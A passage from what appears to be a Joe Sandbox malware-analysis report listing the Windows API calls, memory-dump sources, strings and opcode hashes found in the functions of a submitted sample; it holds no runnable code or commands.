                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
                                                                    • String ID:
                                                                    • API String ID: 2664167353-0
                                                                    • Opcode ID: 695602467f09176897c427f8ce801dc5bb0f45efabdac933f2d404493780fad2
                                                                    • Instruction ID: 089a87f4c22df7a75540855fa179224a7dcb47b21ce383acc942ce1480a0ef07
                                                                    • Opcode Fuzzy Hash: 695602467f09176897c427f8ce801dc5bb0f45efabdac933f2d404493780fad2
                                                                    • Instruction Fuzzy Hash: 11110432104347AF9B11AFA4DC41DAB7B9BEF02770B20042DFA1487291EBB2D8418AA5
                                                                    APIs
                                                                    • GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0065ABD7
                                                                    • GetLastError.KERNEL32(?,0065A69F,?,?,?), ref: 0065ABE1
                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,0065A69F,?,?,?), ref: 0065ABF0
                                                                    • HeapAlloc.KERNEL32(00000000,?,0065A69F,?,?,?), ref: 0065ABF7
                                                                    • GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0065AC0E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                    • String ID:
                                                                    • API String ID: 842720411-0
                                                                    • Opcode ID: 179601bacc9a57ec6e8b4337d6f036871aca26bf419a4b12ec48a70f1e33ae7d
                                                                    • Instruction ID: 79ef5e81c37a8209f9d8609a1a3e0342c4ccff25d6ac00af01407e3a661e9ea6
                                                                    • Opcode Fuzzy Hash: 179601bacc9a57ec6e8b4337d6f036871aca26bf419a4b12ec48a70f1e33ae7d
                                                                    • Instruction Fuzzy Hash: FE013C71200204BFDB105FA9DC48DAB3BAEEF8A755B101529F946C3260DA71EC44CF61
                                                                    APIs
                                                                    • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00667A74
                                                                    • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00667A82
                                                                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00667A8A
                                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00667A94
                                                                    • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00667AD0
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                    • String ID:
                                                                    • API String ID: 2833360925-0
                                                                    • Opcode ID: 84a5de91d0f27d6d6278b8aa98be7bb0ebd1bd23aeb97497ccaa8efb213e5d27
                                                                    • Instruction ID: eb73d7cc350fe01ec713a94878e43f6e417f747fa8a5bc05ec6ef9151a0c80ae
                                                                    • Opcode Fuzzy Hash: 84a5de91d0f27d6d6278b8aa98be7bb0ebd1bd23aeb97497ccaa8efb213e5d27
                                                                    • Instruction Fuzzy Hash: A0014C71C04619EBCF00AFE5DC48ADDBB7AFF09715F000495E902B2250DB30AA55CBA5
                                                                    APIs
                                                                    • CLSIDFromProgID.OLE32 ref: 00659ADC
                                                                    • ProgIDFromCLSID.OLE32(?,00000000), ref: 00659AF7
                                                                    • lstrcmpiW.KERNEL32(?,00000000), ref: 00659B05
                                                                    • CoTaskMemFree.OLE32(00000000,?,00000000), ref: 00659B15
                                                                    • CLSIDFromString.OLE32(?,?), ref: 00659B21
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                    • String ID:
                                                                    • API String ID: 3897988419-0
                                                                    • Opcode ID: b07580e8af0a4385eb7d01889286373d25ba653878ac3ac4cc15db702669af0b
                                                                    • Instruction ID: 605282afe27ea99ecf25610b15a15e4f603d6097efdc77c7d66b8c6f76b4cbc5
                                                                    • Opcode Fuzzy Hash: b07580e8af0a4385eb7d01889286373d25ba653878ac3ac4cc15db702669af0b
                                                                    • Instruction Fuzzy Hash: 7F014B76600219FFEB115F68ED44BAABBEEEB46752F148024FD06D2210D774ED489BB0
                                                                    APIs
                                                                    • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 0065AA79
                                                                    • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 0065AA83
                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 0065AA92
                                                                    • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 0065AA99
                                                                    • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0065AAAF
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                    • String ID:
                                                                    • API String ID: 44706859-0
                                                                    • Opcode ID: 9b36b6533faba7bfd6a5d4d7447fb16218b5fff4822f8be2847e9f9b087b6eea
                                                                    • Instruction ID: 2d2e63ff2882ef3a9bf2f9258f41e5a751817c327cf577d470dffdc67170305c
                                                                    • Opcode Fuzzy Hash: 9b36b6533faba7bfd6a5d4d7447fb16218b5fff4822f8be2847e9f9b087b6eea
                                                                    • Instruction Fuzzy Hash: 07F04F712402087FEB116FA4EC89EAB3BAEFF4A755F000619F942C7290DB60AC45CE61
                                                                    APIs
                                                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0065AADA
                                                                    • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0065AAE4
                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0065AAF3
                                                                    • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0065AAFA
                                                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0065AB10
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                    • String ID:
                                                                    • API String ID: 44706859-0
                                                                    • Opcode ID: e82ca7b0dca7481e13bc95795c38ac7d250f968e829874842d6e0fe6f693d948
                                                                    • Instruction ID: 844076cf31c7c6c9e8cfe214f5793a4f040d2b022c6c5a6ae7b793eab67aa4d4
                                                                    • Opcode Fuzzy Hash: e82ca7b0dca7481e13bc95795c38ac7d250f968e829874842d6e0fe6f693d948
                                                                    • Instruction Fuzzy Hash: 04F04F712402087FEB111FA4EC88EBB3B6EFF46755F000129F942C7290DA60AC058EB1
                                                                    APIs
                                                                    • GetDlgItem.USER32(?,000003E9), ref: 0065EC94
                                                                    • GetWindowTextW.USER32(00000000,?,00000100), ref: 0065ECAB
                                                                    • MessageBeep.USER32(00000000), ref: 0065ECC3
                                                                    • KillTimer.USER32(?,0000040A), ref: 0065ECDF
                                                                    • EndDialog.USER32(?,00000001), ref: 0065ECF9
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                    • String ID:
                                                                    • API String ID: 3741023627-0
                                                                    • Opcode ID: fa8a8d54269bcab448bc41ddd9befadbec7c9401e36ee351a4212c154fa9491b
                                                                    • Instruction ID: e08c45d8b2497805585be7045fce197e2ec2e1b3bcf90affcc39fc169bfc4546
                                                                    • Opcode Fuzzy Hash: fa8a8d54269bcab448bc41ddd9befadbec7c9401e36ee351a4212c154fa9491b
                                                                    • Instruction Fuzzy Hash: 14016D30900715ABEF296B10DE4EB9677BABF01706F005559B9A7A18E0DBF5AA488F40
                                                                    APIs
                                                                    • EndPath.GDI32(?), ref: 0063B0BA
                                                                    • StrokeAndFillPath.GDI32(?,?,0069E680,00000000,?,?,?), ref: 0063B0D6
                                                                    • SelectObject.GDI32(?,00000000), ref: 0063B0E9
                                                                    • DeleteObject.GDI32 ref: 0063B0FC
                                                                    • StrokePath.GDI32(?), ref: 0063B117
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                    • String ID:
                                                                    • API String ID: 2625713937-0
                                                                    • Opcode ID: 3f9bd7a2e8c92c025c7cafd337a7c154ad57d8982b716a07540ad9bed70985a9
                                                                    • Instruction ID: d7ce7aafb1b9448172be6b4aa0ff5d3052e6972a046d9364a332b69fd92fd172
                                                                    • Opcode Fuzzy Hash: 3f9bd7a2e8c92c025c7cafd337a7c154ad57d8982b716a07540ad9bed70985a9
                                                                    • Instruction Fuzzy Hash: 48F01970000384EFCB21AF65EC4C7993B67AB12362F18A314E5664C5F0C7309A66EF50
                                                                    APIs
                                                                    • CoInitialize.OLE32(00000000), ref: 0066F2DA
                                                                    • CoCreateInstance.OLE32(006ADA7C,00000000,00000001,006AD8EC,?), ref: 0066F2F2
                                                                    • CoUninitialize.OLE32 ref: 0066F555
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: CreateInitializeInstanceUninitialize
                                                                    • String ID: .lnk
                                                                    • API String ID: 948891078-24824748
                                                                    • Opcode ID: 2b9c2a556ce9df68016599c505ce4f3bff16af1c7a945a295fc0c30cf37835de
                                                                    • Instruction ID: 2162cf6b9b0cc92cc63c55ba176a799c2cc7343068c08cc4c8cf18669f8d760d
                                                                    • Opcode Fuzzy Hash: 2b9c2a556ce9df68016599c505ce4f3bff16af1c7a945a295fc0c30cf37835de
                                                                    • Instruction Fuzzy Hash: F9A13AB1104201AFD740EF64D891EAFB7EDEF98314F00491DF55697192EB70EA09CBA6
                                                                    APIs
                                                                      • Part of subcall function 0062660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,006253B1,?,?,006261FF,?,00000000,00000001,00000000), ref: 0062662F
                                                                    • CoInitialize.OLE32(00000000), ref: 0066E85D
                                                                    • CoCreateInstance.OLE32(006ADA7C,00000000,00000001,006AD8EC,?), ref: 0066E876
                                                                    • CoUninitialize.OLE32 ref: 0066E893
                                                                      • Part of subcall function 0062936C: __swprintf.LIBCMT ref: 006293AB
                                                                      • Part of subcall function 0062936C: __itow.LIBCMT ref: 006293DF
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                                    • String ID: .lnk
                                                                    • API String ID: 2126378814-24824748
                                                                    • Opcode ID: d1633e6e78fbcb8b32fb8a42d76d224fe64a72801dce39fd6fe7df092b4ec278
                                                                    • Instruction ID: 50d652132781e205843be95e01d8c50ea35872a36ed29d8da680e2fbd167d880
                                                                    • Opcode Fuzzy Hash: d1633e6e78fbcb8b32fb8a42d76d224fe64a72801dce39fd6fe7df092b4ec278
                                                                    • Instruction Fuzzy Hash: 11A154796047119FCB50EF14C48496ABBE6BF89310F04898CF9969B3A1CB32EC45CF95
                                                                    APIs
                                                                    • __startOneArgErrorHandling.LIBCMT ref: 006432ED
                                                                      • Part of subcall function 0064E0D0: __87except.LIBCMT ref: 0064E10B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorHandling__87except__start
                                                                    • String ID: pow
                                                                    • API String ID: 2905807303-2276729525
                                                                    • Opcode ID: ec2a2b731a6aa9f30c7a0ba29fc91398d14dda941b39888f86ad32b71f74ef02
                                                                    • Instruction ID: d1db6a3c103fa805677ac9e876653f83a4fba3779a7aa08258db022090bf17cd
                                                                    • Opcode Fuzzy Hash: ec2a2b731a6aa9f30c7a0ba29fc91398d14dda941b39888f86ad32b71f74ef02
                                                                    • Instruction Fuzzy Hash: 2C515A71A0820296CB127B14C9413FB3BD7BB40710F209E28E4D6823E9DFB68ED59A46
                                                                    APIs
                                                                    • CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,006BDC50,?,0000000F,0000000C,00000016,006BDC50,?), ref: 00664645
                                                                      • Part of subcall function 0062936C: __swprintf.LIBCMT ref: 006293AB
                                                                      • Part of subcall function 0062936C: __itow.LIBCMT ref: 006293DF
                                                                    • CharUpperBuffW.USER32(?,?,00000000,?), ref: 006646C5
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: BuffCharUpper$__itow__swprintf
                                                                    • String ID: REMOVE$THIS
                                                                    • API String ID: 3797816924-776492005
                                                                    • Opcode ID: 3c0af158a056772f2052add8ec07033a0637866e2ed67d059811d99e3f97ad88
                                                                    • Instruction ID: 746a6a6b48222d846935be0b74c123816ffce691d2dd300e29be1e8be8ea3934
                                                                    • Opcode Fuzzy Hash: 3c0af158a056772f2052add8ec07033a0637866e2ed67d059811d99e3f97ad88
                                                                    • Instruction Fuzzy Hash: 92415E34A002199FCF45EF64C881AAEBBB6FF49304F148469E916AB3A2DF34DD45CB54
                                                                    APIs
                                                                      • Part of subcall function 0066430B: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,0065BC08,?,?,00000034,00000800,?,00000034), ref: 00664335
                                                                    • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0065C1D3
                                                                      • Part of subcall function 006642D6: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,0065BC37,?,?,00000800,?,00001073,00000000,?,?), ref: 00664300
                                                                      • Part of subcall function 0066422F: GetWindowThreadProcessId.USER32(?,?), ref: 0066425A
                                                                      • Part of subcall function 0066422F: OpenProcess.KERNEL32(00000438,00000000,?,?,?,0065BBCC,00000034,?,?,00001004,00000000,00000000), ref: 0066426A
                                                                      • Part of subcall function 0066422F: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,0065BBCC,00000034,?,?,00001004,00000000,00000000), ref: 00664280
                                                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0065C240
                                                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0065C28D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                    • String ID: @
                                                                    • API String ID: 4150878124-2766056989
                                                                    • Opcode ID: c7682a68f6b54a604503570a69523e04cd60d6314ea9a02b437600a29e9c3096
                                                                    • Instruction ID: a929570c56e358b92ca36014d1147906d3c4939829bdafa0425e8835d06a6fbd
                                                                    • Opcode Fuzzy Hash: c7682a68f6b54a604503570a69523e04cd60d6314ea9a02b437600a29e9c3096
                                                                    • Instruction Fuzzy Hash: 55414C72900218BFDB10DFA4CC81AEEB779EF09710F104099FA45B7281DA71AF49CB61
                                                                    APIs
                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,006BDC00,00000000,?,?,?,?), ref: 0068A6D8
                                                                    • GetWindowLongW.USER32 ref: 0068A6F5
                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0068A705
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Long
                                                                    • String ID: SysTreeView32
                                                                    • API String ID: 847901565-1698111956
                                                                    • Opcode ID: 3b1ac1abbe96535cc0bff1e18009da717377cef953d8b21c7b097c7ffb7637b0
                                                                    • Instruction ID: 8d87f43d6ab1e5a2efefff8205733d6b1edb27b05581d8aa16e8df116be91b52
                                                                    • Opcode Fuzzy Hash: 3b1ac1abbe96535cc0bff1e18009da717377cef953d8b21c7b097c7ffb7637b0
                                                                    • Instruction Fuzzy Hash: CC31E131100206AFEB21AF74CC41BEA7BAAFF49324F24431AF975932E0D730AC509B94
                                                                    APIs
                                                                    • _memset.LIBCMT ref: 00675190
                                                                    • InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 006751C6
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: CrackInternet_memset
                                                                    • String ID: |$Dg
                                                                    • API String ID: 1413715105-1330200442
                                                                    • Opcode ID: 29499d9b9dda037cb65ca7a2290db4e89d51feb6427a16ec760bc1521dd31ee1
                                                                    • Instruction ID: cd771f487d3030bdb2c32ab30f65413f1e5138b22486ce7814982b9e89835ad0
                                                                    • Opcode Fuzzy Hash: 29499d9b9dda037cb65ca7a2290db4e89d51feb6427a16ec760bc1521dd31ee1
                                                                    • Instruction Fuzzy Hash: 50315971C01119EBCF51EFA0DC81AEE7FBAFF14710F004059F915A6166EA31AA06CFA4
                                                                    APIs
                                                                    • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 0068A15E
                                                                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 0068A172
                                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 0068A196
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$Window
                                                                    • String ID: SysMonthCal32
                                                                    • API String ID: 2326795674-1439706946
                                                                    • Opcode ID: c53e14122089d48160764d7f1b65f6c35f66537f6c7775d9352b365033e950b5
